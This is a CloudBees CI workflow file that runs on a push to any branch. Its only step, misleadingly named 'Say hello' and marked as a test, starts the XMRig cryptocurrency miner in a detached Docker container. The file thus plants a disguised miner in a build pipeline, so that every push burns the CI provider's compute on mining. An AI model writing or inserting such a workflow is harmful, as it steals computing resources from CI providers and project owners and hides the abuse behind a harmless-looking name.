apiVersion: automation.cloudbees.io/v1alpha1
kind: workflow
name: My automation
on:
  push:
    branches:
      - "**"
jobs:
  build:
    steps:
      - uses: docker://rcmelendez/xmrig
        name: Say hello
        kind: test
        shell: sh
        run: |-
          docker run -dit --rm \
              --volume "$(pwd)"/config.json:/xmrig/etc/config.json:ro \
              --volume "$(pwd)"/log:/xmrig/log \
              --name xmrig rcmelendez/xmrig \
              xmrig --config=/xmrig/etc/config.json
          docker logs xmrig
